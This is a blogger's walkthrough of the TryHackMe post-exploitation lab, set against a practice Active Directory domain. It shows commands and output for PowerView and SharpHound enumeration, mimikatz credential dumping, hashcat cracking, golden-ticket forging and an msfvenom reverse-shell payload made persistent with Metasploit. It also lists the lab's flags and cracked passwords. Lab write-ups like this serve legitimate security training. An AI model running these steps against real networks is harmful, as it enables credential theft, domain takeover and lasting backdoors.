Home Post-Exploitation Basics
Post
Cancel

Post-Exploitation Basics

Posted Jun 21, 2022
By 0xskar
9 min read

The basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom

https://tryhackme.com/room/postexploit

Task 1 - Introduction

This room will cover all of the basics of post-exploitation; we’ll talk everything from post-exploitation enumeration with powerview and bloodhound, dumping hashes and golden ticket attacks with mimikatz, basic information gathering using windows server tools and logs, and then we will wrap up this room talking about the basics of maintaining access with the persistence metaploit module and creating a backdoor into the machine to get an instant meterpreter shell if the system is ever shutdown or reset.

Task 2 - Enumeration w/ Powerview

  1. powershell -ep bypass start powershell -ep bypass bypasses the execution policy of powershell allowing us to run scripts easily
  2. . .\Downloads\PowerView.ps1 start PowerView
  3. Get-NetUser | select cn - enumerate domain users
1
2
3
4
5
6
7
8
9
10
11
12

PS C:\Users\Administrator\Downloads> Get-NetUser | select cn 
cn                  
--                                    
Administrator                         
Guest                                 
krbtgt                                
Machine-1                             
Admin2                                
Machine-2                             
SQL Service                           
POST{P0W3RV13W_FTW}                   
sshd
  1. Get-NetGroup -GroupName *admin* - enumerate domain groups
1
2
3
4
5
6
7
8
9
10
11

PS C:\Users\Administrator\Downloads> Get-NetGroup -GroupName *admin* 
Administrators 
Hyper-V Administrators         
Storage Replica Administrators 
Schema Admins                  
Enterprise Admins              
Domain Admins                  
Key Admins                            
Enterprise Key Admins                 
DnsAdmins                             
PS C:\Users\Administrator\Downloads>
  1. Invoke-ShareFinder Find Shares
1
2
3
4
5
6
7

PS C:\Users\Administrator\Downloads> Invoke-ShareFinder
\\Domain-Controller.CONTROLLER.local\ADMIN$     - Remote Admin 
\\Domain-Controller.CONTROLLER.local\C$         - Default share
\\Domain-Controller.CONTROLLER.local\IPC$       - Remote IPC
\\Domain-Controller.CONTROLLER.local\NETLOGON   - Logon server share
\\Domain-Controller.CONTROLLER.local\Share      -
\\Domain-Controller.CONTROLLER.local\SYSVOL     - Logon server share
  1. Get-NetComputer -fulldata | select operatingsystem Find Operating Systems
1
2
3
4
5
6
7

PS C:\Users\Administrator\Downloads> Get-NetComputer -fulldata | select operatingsystem

operatingsystem
---------------
Windows Server 2019 Standard
Windows 10 Enterprise Evaluation
Windows 10 Enterprise Evaluation

Answer the questions below

What is the shared folder that is not set by default?

  • share

What operating system is running inside of the network besides Windows Server 2019?

  • Windows 10 nterprise Evaluation

I’ve hidden a flag inside of the users find it

  • POST{P0W3RV13W_FTW}

Task 3 - Enumeration w/ Bloodhound

  • Bloodhound is a graphical interface that allows you to visually map out the network. This tool along with SharpHound which similar to PowerView takes the user, groups, trusts etc. of the network and collects them into .json files to be used inside of Bloodhound.

  • sudo neo4j console - default credentials = neo4j:neo4j

Getting Loot w/ Sharphound

  1. powershell -ep bypass allows us to run scripts
  2. . .\SharpHound.ps1 - start sharphound
  3. Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip - loot everything
  4. scp Administrator@10.10.70.220:/users/Administrator/Downloads/20220621140925_loot.zip ~/thm/postexploit - scp over to kali
  5. run bloodhound on kali and import (drag and drop if import doesnt work)

Answer the questions below

What service is also a domain admin

  • sqlservice

What two users are Kerberoastable?

  • sqlservice krbtgt

Task 4 - Dumping hashes w/ mimikatz

  1. mimikatz.exe run mimikatz
  2. check privilege need 20 OK privilege::debug
  3. lsadump::lsa /patch hash dump
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

mimikatz # lsadump::lsa /patch 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 
                                                              
RID  : 000001f4 (500)                                         
User : Administrator                                          
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

RID  : 0000044f (1103)
User : Machine1
LM   :
NTLM : 64f12cddaa88057e06a81b54e73b949b

RID  : 00000451 (1105)
User : Admin2
LM   :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe

RID  : 00000452 (1106) 
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0

RID  : 00000453 (1107)
User : SQLService
LM   :
NTLM : f4ab68f27303bcb4024650d8fc5f973a

RID  : 00000454 (1108)
User : POST
LM   :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2

RID  : 00000457 (1111)
User : sshd
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM   :
NTLM : 3b86e8b40884378eeb3d988ed098ebfb

RID  : 00000455 (1109)
User : DESKTOP-2$
LM   :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c

RID  : 00000456 (1110)
User : DESKTOP-1$
LM   :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a
  1. hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/seclists/Passwords/rockyou.txt
  2. hashcat -m 1000 c39f2beb3d2ec06a62cb887fb391dee0 /usr/share/seclists/Passwords/rockyou.txt

Answer the questions below

what is the Machine1 Password?

  • 64f12cddaa88057e06a81b54e73b949b:Password1

What is the Machine2 Hash?

  • c39f2beb3d2ec06a62cb887fb391dee0:Password2

Task 5 - Golden Ticket Attacks w/ mimikatz

  • We will first dump the hash and sid of the krbtgt user then create a golden ticket and use that golden ticket to open up a new command prompt allowing us to access any machine on the network.
  1. dump the krbtgt hash and security identifier lsadump::lsa /inject /name:krbtgt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

mimikatz # lsadump::lsa /inject /name:krbtgt 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf
    LM   :
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
    lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

 * WDigest
    01  49a8de3b6c7ae1ddf36aa868e68cd9ea
    02  7902703149b131c57e5253fd9ea710d0
    03  71288a6388fb28088a434d3705cc6f2a
    04  49a8de3b6c7ae1ddf36aa868e68cd9ea
    05  7902703149b131c57e5253fd9ea710d0
    06  df5ad3cc1ff643663d85dabc81432a81 
    07  49a8de3b6c7ae1ddf36aa868e68cd9ea
    08  a489809bd0f8e525f450fac01ea2054b
    09  19e54fd00868c3b0b35b5e0926934c99
    10  4462ea84c5537142029ea1b354cd25fa
    11  6773fcbf03fd29e51720f2c5087cb81c
    12  19e54fd00868c3b0b35b5e0926934c99
    13  52902abbeec1f1d3b46a7bd5adab3b57
    14  6773fcbf03fd29e51720f2c5087cb81c
    15  8f2593c344922717d05d537487a1336d
    16  49c009813995b032cc1f1a181eaadee4
    17  8552f561e937ad7c13a0dca4e9b0b25a 
    18  cc18f1d9a1f4d28b58a063f69fa54f27
    19  12ae8a0629634a31aa63d6f422a14953
    20  b6392b0471c53dd2379dcc570816ba10
    21  7ab113cb39aa4be369710f6926b68094
    22  7ab113cb39aa4be369710f6926b68094
    23  e38f8bc728b21b85602231dba189c5be
    24  4700657dde6382cd7b990fb042b00f9e
    25  8f46d9db219cbd64fb61ba4fdb1c9ba7
    26  36b6a21f031bf361ce38d4d8ad39ee0f
    27  e69385ee50f9d3e105f50c61c53e718e
    28  ca006400aefe845da46b137b5b50f371 
    29  15a607251e3a2973a843e09c008c32e3

 * Kerberos
    Default Salt : CONTROLLER.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 64ef5d43922f3b5d

 * Kerberos-Newer-Keys
    Default Salt : CONTROLLER.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc6424
6bda3c75fe53d
      aes128_hmac       (4096) : 7eb35bddd529c0614e5ad9db4c798066
      des_cbc_md5       (4096) : 64ef5d43922f3b5d

 * NTLM-Strong-NTOWF
    Random Value : 666caaaaf30081f30211bd7fa445fec4
  1. we need the SID which is (S-1-5-21-849420856-2351964222-986696166) the user which is krbtgt and the NTLM hash which is 5508500012cc005cf7082a9a89ebdfdf also our administrator id which is 500
  2. put everything toget for the golden ticket: kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf id:500
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-
21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf id:500   
User      : Administrator 
Domain    : controller.local (CONTROLLER)
SID       : S-1-5-21-849420856-2351964222-986696166
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt
Lifetime  : 6/21/2022 5:46:43 PM ; 6/18/2032 5:46:43 PM ; 6/18/2032 5:46:43 PM      
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

Use Golden Ticket to Access Other Machines

  1. misc::cmd to open a new command promt with elevated privileges to all machines
1
2

mimikatz # misc::cmd 
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF7676543B8
  1. Access other machines from command promt!

Task 6 - Enumeration w/ Server Manager

  • the main tabs that will be most interesting are the tools and manage tabs the tools tab is where you will find most of your information such as users, groups, trusts, computers.
  • The manage tab will allow you to add roles and features however this will probably get picked up by a systems admin relatively quick.
  • Dont worry about the AD CS, AD DS, DNS, or File and Storage Services these are setup for exploitation of the active directory and dont have much use for post-exploitation
  1. Navigate to the tools tab top right and select the Active Directory Users and Computers. This will pull up a list of all users on the domain as well as some other useful tabs to use such as groups and computers. Some sys admins dont realize that you as an attacker can see the descriptions of user accounts so they may set the service accounts passwords inside of the description look into the description and find what the SQL Service password is

Answer the questions below

What tool allows to view the event logs?

  • event viewer

What is the SQL Service password

  • MYpassword123#

Task 7 - Maintaining Access

We will be covering a fairly simple way of maintaining access by first setting up a meterpreter shell and then using the persistence metasploit module allowing us to create a backdoor service in the system that will give us an instant meterpreter shell if the machine is ever shutdown or reset.

There are also other ways of maintaining access such as advanced backdoors and rootkits however those are out of scope for this room.

This will require a little more manual setup than the other tasks so it is recommended to have previous knowledge of msfvenom and metasploit.

  1. Generate payload with msfvenom msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=6669 -f exe -o shell.exe
  2. Transfer payload to target scp shell.exe Administrator@10.10.114.62:/Users/Administrator/Downloads
  3. in msfconsole use exploit/multi/handler, configure payload set payload windows/meterpreter/reverse_tcp and set options to listen on port 6669 and run
  4. execute the binary on the target windows machine which should connect us with meterpreter shell.
  5. background meterpreter shell to run persistance module.
  6. setup persistance module use exploit/windows/local/persistance with set session 1 then run

If the system is shut down or reset for whatever reason you will lose your meterpreter session however by using the persistence module you create a backdoor into the system which you can access at any time using the metasploit exploit/multi/handler and setting the payload to windows/meterpreter/reverse_tcp allowing you to send another meterpreter payload to the machine and open up a new meterpreter session.

Task 8 - Conclustion

This room has given a good beginning with post-exploitation however there are a lot of other methods ever-evolving. I suggest to you to go out and do your own research find your own tools that you like to use for post-exploitation. I hope to make another room similar to this covering more advanced topics such as more in-depth backdoors and trojans, pivoting, token impersonation, and silver ticket attacks. I hope that this room has helped to give you a better understanding of how post-exploitation works in a real-world scenario.

Resources -

Tools/Malware Used -

Lesson, Tryhackme
hydra
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents